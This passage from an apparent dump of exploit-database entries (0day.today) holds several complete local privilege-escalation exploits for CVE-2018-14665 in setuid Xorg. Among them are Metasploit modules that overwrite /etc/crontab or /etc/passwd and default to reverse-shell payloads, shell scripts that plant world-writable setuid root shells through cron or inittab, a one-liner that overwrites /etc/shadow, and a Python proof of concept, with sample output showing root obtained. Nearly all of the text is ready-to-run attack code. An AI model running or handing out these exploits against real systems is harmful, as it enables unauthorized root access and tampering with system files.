have console auth\"\r\n vprint_error \"Below is Xorg -version output\"\r\n vprint_error x_version\r\n return CheckCode::Safe\r\n else\r\n vprint_warning \"Could not parse Xorg -version output\"\r\n return CheckCode::Appears\r\n end\r\n vprint_good \"Xorg version #{v} is vulnerable\"\r\n\r\n # process check for /X\r\n proc_list = cmd_exec \"ps ax\"\r\n if proc_list.include?('/X ')\r\n vprint_warning('Xorg in process list')\r\n return CheckCode::Appears\r\n end\r\n vprint_good('Xorg does not appear to be running')\r\n return CheckCode::Vulnerable\r\n end\r\n\r\n def check_arch_and_compile(path, data)\r\n cpu = ''\r\n if target['Arch'] == ARCH_X86\r\n cpu = Metasm::Ia32.new\r\n compile_with_metasm(cpu, path, data)\r\n elsif target['Arch'] == ARCH_SPARC\r\n compile_with_gcc(path, data)\r\n else\r\n cpu = Metasm::X86_64.new\r\n compile_with_metasm(cpu, path, data)\r\n end\r\n end\r\n\r\n def 
compile_with_metasm(cpu, path, data)\r\n shared_obj = Metasm::ELF.compile_c(cpu, data).encode_string(:lib)\r\n write_file(path, shared_obj)\r\n register_file_for_cleanup path\r\n\r\n chmod path\r\n rescue\r\n print_status('Failed to compile with Metasm. Falling back to compiling with GCC.')\r\n compile_with_gcc(path, data)\r\n end\r\n\r\n def compile_with_gcc(path, data)\r\n unless has_gcc?\r\n fail_with Failure::BadConfig, 'gcc is not installed'\r\n end\r\n vprint_good 'gcc is installed'\r\n\r\n src_path = \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(6..10)}.c\"\r\n write_file(src_path, data)\r\n\r\n gcc_cmd = \"gcc -fPIC -shared -o #{path} #{src_path} -nostartfiles\"\r\n if session.type.eql? 'shell'\r\n gcc_cmd = \"PATH=$PATH:/usr/bin/ #{gcc_cmd}\"\r\n end\r\n output = cmd_exec gcc_cmd\r\n register_file_for_cleanup src_path\r\n register_file_for_cleanup path\r\n\r\n unless output.blank?\r\n print_error output\r\n fail_with Failure::Unknown, \"#{src_path} failed to compile\"\r\n end\r\n\r\n chmod path\r\n end\r\n\r\n def exploit\r\n check_status = check\r\n if check_status == CheckCode::Appears\r\n print_warning 'Could not get version or Xorg process possibly running, may fail'\r\n elsif check_status == CheckCode::Safe\r\n fail_with Failure::NotVulnerable, 'Target not vulnerable'\r\n end\r\n\r\n if is_root?\r\n fail_with Failure::BadConfig, 'This session already has root privileges'\r\n end\r\n\r\n unless writable? 
datastore['WritableDir']\r\n fail_with Failure::BadConfig, \"#{datastore['WritableDir']} is not writable\"\r\n end\r\n\r\n print_good 'Passed all initial checks for exploit'\r\n\r\n modulepath = datastore['WritableDir']\r\n sofile = \"#{modulepath}/#{datastore['sofile']}\"\r\n pscript = \"#{modulepath}/.session-#{rand_text_alphanumeric 5..10}\"\r\n xdisplay = datastore['Xdisplay']\r\n\r\n stub = %Q^\r\nextern int setuid(int);\r\nextern int setgid(int);\r\nextern int system(const char *__s);\r\n\r\nvoid _init(void) __attribute__((constructor));\r\n\r\nvoid __attribute__((constructor)) _init() {\r\nsetgid(0);\r\nsetuid(0);\r\nsystem(\"#{pscript} &\");\r\n }\r\n ^\r\n print_status 'Writing launcher and compiling'\r\n check_arch_and_compile(sofile, stub)\r\n\r\n # Uploading\r\n print_status 'Uploading your payload, this could take a while'\r\n if payload.arch.first == 'cmd'\r\n write_file(pscript, payload.encoded)\r\n else\r\n write_file(pscript, generate_payload_exe)\r\n end\r\n chmod pscript\r\n register_file_for_cleanup pscript\r\n\r\n\r\n # Actual exploit with cron overwrite\r\n print_status 'Exploiting'\r\n #Xorg -logfile derp -modulepath ',/tmp' :1\r\n xorg_cmd = \"Xorg -modulepath ',#{modulepath}' #{xdisplay} & >/dev/null\"\r\n cmd_exec xorg_cmd\r\n Rex.sleep 7\r\n cmd_exec \"pkill Xorg\"\r\n Rex.sleep 1\r\n end\r\nend\n\n# 0day.today [2019-12-03] #", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/33404"}, {"lastseen": "2019-02-06T07:16:40", "description": "Exploit for solaris/x86 platform in category local exploits", "edition": 1, "published": "2019-01-14T00:00:00", "title": "xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris 11 inittab) Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2019-01-14T00:00:00", "id": "1337DAY-ID-31947", "href": "https://0day.today/exploit/description/31947", "sourceData": "#!/bin/sh\r\n\r\n# Exploit Title: 
xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris11 inittab)\r\n# Date: 2018-11-25\r\n# Exploit Author: Marco Ivaldi\r\n# Vendor Homepage: https://www.x.org/\r\n# Version: xorg-x11-server 1.19.0 - 1.20.2\r\n# Tested on: Oracle Solaris 11.4\r\n# CVE : CVE-2018-14665\r\n\r\n#\r\n# raptor_solgasm - xorg-x11-server LPE via Solaris inittab\r\n# Copyright (c) 2018 Marco Ivaldi <[email\u00a0protected]>\r\n#\r\n# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission \r\n# check for -modulepath and -logfile options when starting Xorg. X server \r\n# allows unprivileged users with the ability to log in to the system via \r\n# physical console to escalate their privileges and run arbitrary code under \r\n# root privileges (CVE-2018-14665).\r\n#\r\n# \"In video games, this is what they call respawning\" -- Nick Sax\r\n#\r\n# This exploit targets /etc/inittab in order to escalate privileges to root\r\n# on Solaris 11 (no need to be connected to a physical console). Messing with \r\n# inittab is considerably dangerous and you may trash your system, however the\r\n# other potential vectors (cron, passwd, sudo, ld.config, etc.) either don't \r\n# work or are even worse. 
Still, DON'T RUN UNLESS YOU KNOW WHAT YOU ARE DOING!\r\n#\r\n# See also:\r\n# https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm\r\n#\r\n# Usage:\r\n# [email\u00a0protected]:~$ chmod +x raptor_solgasm\r\n# [email\u00a0protected]:~$ ./raptor_solgasm\r\n# [...]\r\n# Now please be patient for a few minutes...\r\n# [...]\r\n# To avoid trashing the system, remember to: mv /etc/inittab.old /etc/inittab\r\n# -rw-r--r-- 1 root staff 13870 nov 24 22:01 /etc/inittab\r\n# -rw-r--r-- 1 root sys 967 nov 24 20:01 /etc/inittab.old\r\n# -rwsrwxrwx 1 root root 1249080 nov 24 22:05 /tmp/pwned\r\n# [email\u00a0protected]:/etc# id\r\n# uid=0(root) gid=0(root)\r\n#\r\n# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2):\r\n# Oracle Solaris 11 X86 [tested on 11.4.0.0.1.15.0 with Xorg 1.19.5]\r\n# Oracle Solaris 11 SPARC [untested]\r\n#\r\n\r\necho \"raptor_solgasm - xorg-x11-server LPE via Solaris inittab\"\r\necho \"Copyright (c) 2018 Marco Ivaldi <[email\u00a0protected]>\"\r\n\r\n# prepare the payload\r\ncat << EOF > /tmp/solgasm\r\ncp /bin/zsh /tmp/pwned # fallback in case gcc is not available\r\necho \"main(){setuid(0);setgid(0);system(\\\"/bin/bash\\\");}\" > /tmp/pwned.c\r\ngcc /tmp/pwned.c -o /tmp/pwned\r\nchmod 4777 /tmp/pwned\r\nEOF\r\nchmod +x /tmp/solgasm\r\n\r\n# trigger the bug\r\nPWN=x$(cat /dev/urandom | env LC_CTYPE=C tr -dc '[:lower:]' | fold -3 | head -1)\r\ncd /etc\r\nXorg -fp \"${PWN}::respawn:/tmp/solgasm\" -logfile inittab :1 &\r\nsleep 5\r\npkill Xorg\r\n\r\n# run the setuid shell\r\necho\r\necho \"Now please be patient for a few minutes...\"\r\necho\r\nuntil [ -u /tmp/pwned ]; do sleep 1; done\r\necho \"To avoid trashing the system remember to mv /etc/inittab.old /etc/inittab\"\r\nls -l /etc/inittab*\r\nls -l /tmp/pwned\r\nsleep 1\r\n/tmp/pwned\n\n# 0day.today [2019-02-06] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/31947"}, {"lastseen": 
"2018-10-26T20:41:22", "description": "Exploit for multiple platform in category local exploits", "edition": 1, "published": "2018-10-26T00:00:00", "title": "xorg-x11-server 1.20.3 - Local Privilege Escalation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-10-26T00:00:00", "id": "1337DAY-ID-31436", "href": "https://0day.today/exploit/description/31436", "sourceData": "xorg-x11-server Local Privilege Escalation\r\n\r\n#CVE-2018-14665 - a LPE exploit via http://X.org fits in a tweet\r\n \r\ncd /etc; Xorg -fp \"root::16431:0:99999:7:::\" -logfile shadow :1;su\r\n \r\nOverwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected.\r\n \r\n \r\n \r\n \r\n \r\n#!/bin/sh\r\n# local privilege escalation in X11 currently\r\n# unpatched in OpenBSD 6.4 stable - exploit\r\n# uses cve-2018-14665 to overwrite files as root. \r\n# Impacts Xorg 1.19.0 - 1.20.2 which ships setuid\r\n# and vulnerable in default OpenBSD.\r\n#\r\n# - https://hacker.house\r\necho [+] OpenBSD 6.4-stable local root exploit\r\ncd /etc\r\nXorg -fp 'root:$2b$08$As7rA9IO2lsfSyb7OkESWueQFzgbDfCXw0JXjjYszKa8Aklt5RTSG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh' -logfile master.passwd :1 &\r\nsleep 5\r\npkill Xorg\r\necho [-] dont forget to mv and chmod /etc/master.passwd.old back \r\necho [+] type 'Password1' and hit enter for root\r\nsu -\r\n \r\n \r\nEBB Note ~ Another version of it: https://gist.github.com/0x27/d8aae5de44ed385ff2a3d80196907850\n\n# 0day.today [2018-10-26] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31436"}, {"lastseen": "2018-12-01T19:39:11", "description": "This Metasploit module attempts to gain root privileges with SUID Xorg X11 server versions 1.19.0 up to 1.20.3. A permission check flaw exists for -modulepath and -logfile options when starting Xorg. 
This allows unprivileged users that can start the server the ability to elevate privileges and run arbitrary code under root privileges. This Metasploit module has been tested with OpenBSD 6.3, 6.4, and CentOS 7 (1708). CentOS default install will require console auth for the users session. Cron launches the payload so if Selinux is enforcing exploitation may still be possible, but the module will bail. Xorg must have SUID permissions and may not start if running. On exploitation a crontab.old backup file will be created by Xorg. This Metasploit module will remove the .old file and restore crontab after successful exploitation. Failed exploitation may result in a corrupted crontab. On successful exploitation artifacts will be created consistent with starting Xorg and running a cron.", "edition": 1, "published": "2018-11-26T00:00:00", "title": "Xorg X11 Server SUID Privilege Escalation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-11-26T00:00:00", "id": "1337DAY-ID-31674", "href": "https://0day.today/exploit/description/31674", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GoodRanking\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n include Msf::Post::File\r\n include Msf::Post::Linux::Priv\r\n include Msf::Post::Linux::Kernel\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Xorg X11 Server SUID privilege escalation',\r\n 'Description' => %q{\r\n This module attempts to gain root privileges with SUID Xorg X11 server\r\n versions 1.19.0 < 1.20.3.\r\n\r\n A permission check flaw exists for -modulepath and -logfile options when\r\n starting Xorg. 
This allows unprivileged users that can start the server\r\n the ability to elevate privileges and run arbitrary code under root\r\n privileges.\r\n\r\n This module has been tested with OpenBSD 6.3, 6.4, and CentOS 7 (1708).\r\n CentOS default install will require console auth for the users session.\r\n Cron launches the payload so if Selinux is enforcing exploitation\r\n may still be possible, but the module will bail.\r\n Xorg must have SUID permissions and may not start if running.\r\n\r\n On exploitation a crontab.old backup file will be created by Xorg.\r\n This module will remove the .old file and restore crontab after\r\n successful exploitation. Failed exploitation may result in a corrupted\r\n crontab. On successful exploitation artifacts will be created consistant\r\n with starting Xorg and running a cron.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Narendra Shinde', # Discovery and exploit\r\n 'Raptor - 0xdea', # Modified exploit for cron\r\n 'Aaron Ringo', # Metasploit module\r\n 'Brendan Coles <bcoles[at]gmail.com>' # Metasploit module\r\n ],\r\n 'DisclosureDate' => 'Oct 25 2018',\r\n 'References' =>\r\n [\r\n [ 'CVE', '2018-14665' ],\r\n [ 'BID', '105741' ],\r\n [ 'EDB', '45697' ],\r\n [ 'EDB', '45742' ],\r\n [ 'EDB', '45832' ],\r\n [ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html' ],\r\n [ 'URL', 'https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm' ]\r\n ],\r\n 'Platform' => %w[openbsd linux],\r\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\r\n 'SessionTypes' => %w[shell meterpreter],\r\n 'Targets' =>\r\n [\r\n ['OpenBSD', {\r\n 'Platform' => 'unix',\r\n 'Arch' => [ ARCH_CMD ] } ],\r\n ['Linux x64', {\r\n 'Platform' => 'linux',\r\n 'Arch' => [ ARCH_X64 ] } ],\r\n ['Linux x86', {\r\n 'Platform' => 'linux',\r\n 'Arch' => [ ARCH_X86 ] } ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'PAYLOAD' => 'cmd/unix/reverse_openssl',\r\n 'WfsDelay' => 120\r\n },\r\n 'DefaultTarget' => 0))\r\n\r\n 
register_advanced_options(\r\n [\r\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),\r\n OptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ]),\r\n OptBool.new('ConsoleLock', [ true, 'Will check for console lock under linux', true ])\r\n ]\r\n )\r\n end\r\n\r\n\r\n def check\r\n\r\n # linux checks\r\n uname = cmd_exec \"uname\"\r\n if uname =~ /linux/i\r\n vprint_status \"Running additional check for Linux\"\r\n if datastore['ConsoleLock']\r\n user = cmd_exec \"id -un\"\r\n unless exist? \"/var/run/console/#{user}\"\r\n vprint_error \"No console lock for #{user}\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"Console lock for #{user}\"\r\n end\r\n if selinux_installed?\r\n if selinux_enforcing?\r\n vprint_error 'Selinux is enforcing'\r\n return CheckCode::Safe\r\n end\r\n end\r\n vprint_good \"Selinux is not an issue\"\r\n end\r\n\r\n # suid program check\r\n xorg_path = cmd_exec \"command -v Xorg\"\r\n unless xorg_path.include?(\"Xorg\")\r\n vprint_error \"Could not find Xorg executable\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"Xorg path found at #{xorg_path}\"\r\n unless setuid? 
xorg_path\r\n vprint_error \"Xorg binary #{xorg_path} is not SUID\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"Xorg binary #{xorg_path} is SUID\"\r\n\r\n # version check\r\n x_version = cmd_exec \"Xorg -version\"\r\n if x_version.include?(\"Release Date\")\r\n v = Gem::Version.new(x_version.scan(/\\d\\.\\d+\\.\\d+/).first)\r\n unless v.between?(Gem::Version.new('1.19.0'), Gem::Version.new('1.20.2'))\r\n vprint_error \"Xorg version #{v} not supported\"\r\n return CheckCode::Safe\r\n end\r\n elsif x_version.include?(\"Fatal server error\")\r\n vprint_error \"User probably does not have console auth\"\r\n vprint_error \"Below is Xorg -version output\"\r\n vprint_error x_version\r\n return CheckCode::Safe\r\n else\r\n vprint_warning \"Could not parse Xorg -version output\"\r\n return CheckCode::Appears\r\n end\r\n vprint_good \"Xorg version #{v} is vulnerable\"\r\n\r\n # process check for /X\r\n proc_list = cmd_exec \"ps ax\"\r\n if proc_list.include?('/X ')\r\n vprint_warning('Xorg in process list')\r\n return CheckCode::Appears\r\n end\r\n vprint_good('Xorg does not appear running')\r\n return CheckCode::Vulnerable\r\n end\r\n\r\n def on_new_session(session)\r\n if session.type.to_s.eql? 'meterpreter'\r\n session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'\r\n session.sys.process.execute '/bin/sh', \"-c \\\"#{@clean_up}\\\"\"\r\n else\r\n session.shell_command(@clean_up)\r\n end\r\n print_good \"Returning session after cleaning\"\r\n ensure\r\n super\r\n end\r\n\r\n def exploit\r\n\r\n check_status = check\r\n if check_status == CheckCode::Appears\r\n print_warning 'Could not get version or Xorg process possibly running, may fail'\r\n elsif check_status == CheckCode::Safe\r\n fail_with Failure::NotVulnerable, 'Target not vulnerable'\r\n end\r\n\r\n if is_root?\r\n fail_with Failure::BadConfig, 'This session already has root privileges'\r\n end\r\n\r\n unless writable? 
datastore['WritableDir']\r\n fail_with Failure::BadConfig, \"#{datastore['WritableDir']} is not writable\"\r\n end\r\n\r\n print_good 'Passed all initial checks for exploit'\r\n\r\n pscript = \"#{datastore['WritableDir']}/.session-#{rand_text_alphanumeric 5..10}\"\r\n @clean_up = \"/bin/cat #{pscript}.b > /etc/crontab ; /bin/rm -f #{pscript}.b /etc/crontab.old\"\r\n xdisplay = datastore['Xdisplay']\r\n\r\n # Uploading file crontab will run\r\n print_status 'Uploading your payload, this could take a while'\r\n if payload.arch.first == 'cmd'\r\n write_file(pscript, payload.encoded)\r\n else\r\n write_file(pscript, generate_payload_exe)\r\n end\r\n register_file_for_cleanup pscript\r\n chmod pscript\r\n\r\n # Exploit steps on crontab so backing it up\r\n cmd_exec \"cat /etc/crontab > #{pscript}.b\"\r\n # Actual exploit with cron overwrite\r\n print_status 'Trying /etc/crontab overwrite'\r\n cmd_exec \"cd /etc ; Xorg -fp '* * * * * root #{pscript}' -logfile crontab #{xdisplay} & >/dev/null\"\r\n Rex.sleep 5\r\n cmd_exec \"pkill Xorg\"\r\n Rex.sleep 1\r\n cron_check = cmd_exec \"grep -F #{pscript} /etc/crontab\"\r\n unless cron_check.include? pscript\r\n rm_f \"#{pscript}.b\"\r\n print_error 'Deleting crontab backup'\r\n fail_with Failure::NotVulnerable, '/etc/crontab not modified'\r\n end\r\n print_good '/etc/crontab overwrite successful. 
Waiting for job to run (may take a minute)...'\r\n end\r\nend\n\n# 0day.today [2018-12-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31674"}, {"lastseen": "2018-11-14T05:04:39", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2018-11-13T00:00:00", "title": "xorg-x11-server < 1.20.1 - Local Privilege Escalation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-11-13T00:00:00", "id": "1337DAY-ID-31593", "href": "https://0day.today/exploit/description/31593", "sourceData": "# Exploit Title: xorg-x11-server < 1.20.1 - Local Privilege Escalation (RHEL 7)\r\n# Exploit Author: @bolonobolo\r\n# Vendor Homepage: https://www.x.org/\r\n# Version: 1.19.5\r\n# Tested on: RHEL 7.3 && 7.5\r\n# CVE : CVE-2018-14665\r\n# Explanation\r\n# The only condition that has to be met for this PE to work via SSH is that the legitimate non-root user\r\n# has to be logged in through the console at the moment the PE script is launched.\r\n# In fact, during the logged in session of the legitimate non-root user,\r\n# a file with the name of the non-root user will be created in the /var/run/console folder.\r\n# With that file present, the same non-root user can launch a Xorg command via SSH.\r\n#\r\n# Usage: $ python poc.py\r\n# $ python poc.py\r\n# [*] Waiting for bolo to connect to the console\r\n# [*] OK --> bolo console opened\r\n# [*] Building root shell wait 2 minutes\r\n# [*] crontab overwritten\r\n#\r\n# ... cut Xorg output ...\r\n#\r\n# [*] Xorg killed\r\n# (II) Server terminated successfully (0). 
Closing log file.\r\n# [*] Don't forget to cleanup /etc/crontab and /tmp dir\r\n# sh-4.2# id && whoami\r\n# uid=0(root) gid=0(root) gruppi=0(root),1001(bolo)\r\n# root\r\n# sh-4.2#\r\n \r\n \r\n#!/usr/bin/python\r\nimport os\r\nimport getpass\r\nimport subprocess\r\n \r\nuserList = []\r\npath=\"/var/run/console/\"\r\n \r\ndef getWhoami():\r\n return getpass.getuser()\r\n \r\ndef getConsole(path):\r\n p = subprocess.Popen([\"ls\", path], stdout=subprocess.PIPE)\r\n (console, err) = p.communicate()\r\n consoleList = str.splitlines(console)\r\n return consoleList\r\n \r\ndef payload():\r\n f = open(\"/tmp/payload\", \"w\")\r\n payload = (\"cp /bin/sh /usr/local/bin/shell\\n\"\r\n \"echo \\\"#include <stdio.h> \\\" > /tmp/shell.c\\n\"\r\n \"echo \\\"#include <stdlib.h>\\\" >> /tmp/shell.c\\n\"\r\n \"echo \\\"#include <sys/types.h>\\\" >> /tmp/shell.c\\n\"\r\n \"echo \\\"#include <unistd.h>\\\" >> /tmp/shell.c\\n\"\r\n \"echo 'int main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}' >> /tmp/shell.c\\n\"\r\n \"gcc /tmp/shell.c -o /usr/local/bin/shell\\n\"\r\n \"chmod 4777 /usr/local/bin/shell\\n\")\r\n f.write(payload) \r\n \r\ndef executePayload(): \r\n os.system(\"chmod +x /tmp/payload\")\r\n os.system(\"cd /etc; Xorg -fp \\\"* * * * * root /tmp/payload\\\" -logfile crontab :1 &\")\r\n print \"[*] crontab overwritten\"\r\n os.system(\"sleep 5\")\r\n os.system(\"pkill Xorg\")\r\n print \"[*] Xorg killed\"\r\n os.system(\"sleep 120\")\r\n return\r\n \r\ndef main():\r\n whoami = getWhoami()\r\n print \"[*] Waiting for \" + whoami + \" to connect to the console\"\r\n i = 0\r\n while (i == 0):\r\n consoleList = getConsole(path)\r\n for user in consoleList:\r\n if user == whoami :\r\n print \"[*] OK --> \" + user + \" console opened\"\r\n i = 1\r\n print \"[*] Building root shell wait 2 minutes\"\r\n payload()\r\n executePayload()\r\n print \"[*] Don't forget to cleanup /etc/crontab and /tmp dir\"\r\n os.system(\"/usr/local/bin/shell\") \r\n \r\nif __name__ == 
'__main__':\r\n main()\n\n# 0day.today [2018-11-14] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31593"}, {"lastseen": "2018-10-31T00:40:02", "description": "Exploit for multiple platform in category local exploits", "edition": 1, "published": "2018-10-30T00:00:00", "title": "xorg #x11 #server 1.20.3 - Privilege Escalation Exploit (3)", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-10-30T00:00:00", "id": "1337DAY-ID-31466", "href": "https://0day.today/exploit/description/31466", "sourceData": "# Exploit Title: xorg-x11-server 1.20.3 - Privilege Escalation\r\n# Exploit Author: Marco Ivaldi\r\n# Vendor Homepage: https://www.x.org/\r\n# Version: xorg-x11-server 1.19.0 - 1.20.2\r\n# Tested on: OpenBSD 6.3 and 6.4\r\n# CVE : CVE-2018-14665\r\n \r\n# raptor_xorgasm\r\n \r\n#!/bin/sh\r\n \r\n#\r\n# raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron\r\n# Copyright (c) 2018 Marco Ivaldi <[email\u00a0protected]>\r\n#\r\n# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission \r\n# check for -modulepath and -logfile options when starting Xorg. X server \r\n# allows unprivileged users with the ability to log in to the system via \r\n# physical console to escalate their privileges and run arbitrary code under \r\n# root privileges (CVE-2018-14665).\r\n#\r\n# This exploit targets OpenBSD's cron in order to escalate privileges to\r\n# root on OpenBSD 6.3 and 6.4. 
You don't need to be connected to a physical\r\n# console, it works perfectly on pseudo-terminals connected via SSH as well.\r\n#\r\n# See also:\r\n# https://lists.x.org/archives/xorg-announce/2018-October/002927.html\r\n# https://www.exploit-db.com/exploits/45697/\r\n# https://gist.github.com/0x27/d8aae5de44ed385ff2a3d80196907850\r\n#\r\n# Usage:\r\n# blobfish$ chmod +x raptor_xorgasm\r\n# blobfish$ ./raptor_xorgasm\r\n# [...]\r\n# Be patient for a couple of minutes...\r\n# [...]\r\n# Don't forget to cleanup and run crontab -e to reload the crontab.\r\n# -rw-r--r-- 1 root wheel 47327 Oct 27 14:48 /etc/crontab\r\n# -rwsrwxrwx 1 root wheel 7417 Oct 27 14:50 /usr/local/bin/pwned\r\n# blobfish# id\r\n# uid=0(root) gid=0(wheel) groups=1000(raptor), 0(wheel)\r\n#\r\n# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2):\r\n# OpenBSD 6.4 (Xorg 1.19.6) [tested]\r\n# OpenBSD 6.3 (Xorg 1.19.6) [tested]\r\n#\r\n \r\necho \"raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron\"\r\necho \"Copyright (c) 2018 Marco Ivaldi <[email\u00a0protected]>\"\r\n \r\n# prepare the payload\r\ncat << EOF > /tmp/xorgasm\r\ncp /bin/sh /usr/local/bin/pwned # fallback in case gcc is not available\r\necho \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" > /tmp/pwned.c\r\ngcc /tmp/pwned.c -o /usr/local/bin/pwned # most dirs are mounted nosuid\r\nchmod 4777 /usr/local/bin/pwned\r\nEOF\r\nchmod +x /tmp/xorgasm\r\n \r\n# trigger the bug\r\ncd /etc\r\nXorg -fp \"* * * * * root /tmp/xorgasm\" -logfile crontab :1 &\r\nsleep 5\r\npkill Xorg\r\n \r\n# run the setuid shell\r\necho\r\necho \"Be patient for a couple of minutes...\"\r\necho\r\nsleep 120\r\necho\r\necho \"Don't forget to cleanup and run crontab -e to reload the crontab.\"\r\nls -l /etc/crontab*\r\nls -l /usr/local/bin/pwned\r\n/usr/local/bin/pwned\n\n# 0day.today [2018-10-30] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31466"}, {"lastseen": "2019-12-04T23:55:26", "description": "This 
Metasploit module has been tested with AIX 7.1 and 7.2, and should also work with 6.1. Due to permission restrictions of the crontab in AIX, this module does not use cron, and instead overwrites /etc/passwd in order to create a new user with root privileges. All currently logged in users need to be included when /etc/passwd is overwritten, else AIX will throw 'Cannot get \"LOGNAME\" variable' when attempting to change user. The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX, and is replaced by '-config', in conjunction with ANSI-C quotes to inject newlines when overwriting /etc/passwd.", "edition": 1, "published": "2019-11-14T00:00:00", "title": "Xorg X11 Server Local Privilege Escalation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2019-11-14T00:00:00", "id": "1337DAY-ID-33531", "href": "https://0day.today/exploit/description/33531", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GreatRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Xorg X11 Server Local Privilege Escalation',\r\n 'Description' => %q(\r\n WARNING: Successful execution of this module results in /etc/passwd being overwritten.\r\n\r\n This module is a port of the OpenBSD X11 Xorg exploit to run on AIX.\r\n\r\n A permission check flaw exists for -modulepath and -logfile options when\r\n starting Xorg. 
This allows unprivileged users that can start the server\r\n the ability to elevate privileges and run arbitrary code under root\r\n privileges.\r\n\r\n This module has been tested with AIX 7.1 and 7.2, and should also work with 6.1.\r\n Due to permission restrictions of the crontab in AIX, this module does not use cron,\r\n and instead overwrites /etc/passwd in order to create a new user with root privileges.\r\n All currently logged in users need to be included when /etc/passwd is overwritten,\r\n else AIX will throw 'Cannot get \"LOGNAME\" variable' when attempting to change user.\r\n The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX,\r\n and is replaced by '-config', in conjunction with ANSI-C quotes to inject newlines when\r\n overwriting /etc/passwd.\r\n ),\r\n 'Author' =>\r\n [\r\n 'Narendra Shinde', # Discovery and original FreeBSD exploit\r\n 'Zack Flack <dzflack[at]gmail.com>' # Metasploit module and original AIX exploit\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'DisclosureDate' => 'Oct 25 2018',\r\n 'Notes' =>\r\n {\r\n 'SideEffects' => [ CONFIG_CHANGES ]\r\n },\r\n 'References' =>\r\n [\r\n ['CVE', '2018-14665'],\r\n ['URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html'],\r\n ['URL', 'https://aix.software.ibm.com/aix/efixes/security/xorg_advisory3.asc'],\r\n ['URL', 'https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl'],\r\n ['EDB', '45938']\r\n ],\r\n 'Platform' => ['unix'],\r\n 'Arch' => [ARCH_CMD],\r\n 'SessionTypes' => ['shell'],\r\n 'Payload' => {\r\n 'Compat' => {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'perl'\r\n }\r\n },\r\n 'DefaultOptions' => {\r\n 'Payload' => 'cmd/unix/reverse_perl'\r\n },\r\n 'Targets' =>\r\n [\r\n ['IBM AIX Version 6.1', {}],\r\n ['IBM AIX Version 7.1', {}],\r\n ['IBM AIX Version 7.2', {}]\r\n ],\r\n 'DefaultTarget' => 1))\r\n\r\n register_options(\r\n [\r\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\r\n ]\r\n 
